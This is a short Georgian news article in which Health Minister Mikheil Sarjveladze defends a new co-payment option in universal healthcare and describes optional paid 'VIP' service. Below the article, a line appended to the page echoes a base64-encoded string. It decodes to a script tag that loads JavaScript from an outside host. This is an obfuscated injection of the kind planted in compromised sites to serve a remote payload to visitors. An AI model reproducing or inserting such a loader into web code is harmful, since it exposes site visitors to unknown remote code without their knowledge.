celsiusi
ავერსი შნაიდერი

ვერ გეტყვით, რომ თანაგადახდის მექანიზმის შემოტანა რაიმე ფორმით ნაკლოვანების აღიარებაა - თანაგადახდის შემოტანის მიზეზი ნამდვილად არ არის ის, რომ რაიმე დაეწუნებოდა რომელიმე სერვისს, - ასე შეაფასა ჯანდაცვის მინისტრმა, მიხეილ სარჯველაძემ ინიციატივა, რომელიც საყოველთაო ჯანდაცვის სისტემაში თანაგადახდის მექანიზმის შემოტანას ითვალისწინებს.

როგორც მიხეილ სარჯველაძემ განმარტა, ყველა სერვისი, რომელსაც სახელმწიფო დღეს პაციენტს სთავაზობს, საერთაშორისო სტანდარტს აკმაყოფილებს.

„ჩვენ ვერ ვიტყვით, რომ ეს არის რაიმე ფორმით ნაკლოვანების აღიარება. საუბარია დამატებითი შესაძლებლობის გაჩენაზე, თუმცა, სრული პასუხისმგებლობით შეიძლება ითქვას, რომ ყველა სერვისი, რომელსაც სახელმწიფო დღეს პაციენტს სთავაზობს და სტანდარტულ მომსახურებას წარმოადგენს, საერთაშორისო, კარგ სტანდარტს აკმაყოფილებს. ბუნებრივია, რომ ეს მხედველობაშია მისაღები. თანაგადახდის შემოტანის მიზეზი ნამდვილად არ არის ის, რომ რაიმე დაეწუნებოდა რომელიმე სერვისს, რომელიც ანაზღაურდება ქართული კანონმდებლობის მიხედვით, არსებული ჯანდაცვის სისტემის ფარგლებში. ასეთ ნაკლოვანებას ვერ აღმოაჩენთ“,- აღნიშნა სარჯველაძემ.

ინფორმაციისთვის, მთავრობის დადგენილებით, პაციენტს ექნება არჩევანის შესაძლებლობა, განაგრძოს საყოველთაო ჯანდაცვის პროგრამით გათვალისწინებული სტანდარტულად მაღალი მომსახურებით სარგებლობა ან ისარგებლოს ე.წ. თანაგადახდის ახალი მექანიზმით, საყოველთაო ჯანდაცვის პროგრამიდან გასვლის გარეშე, რა დროსაც სრული ოდენობის ფარგლებში მიიღებს პროგრამულ დაფინანსებას, ხოლო დამატებით საკუთარი არჩევანით იკისრებს მხოლოდ ე.წ. VIP მომსახურების საფასურის გადახდას.

60
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");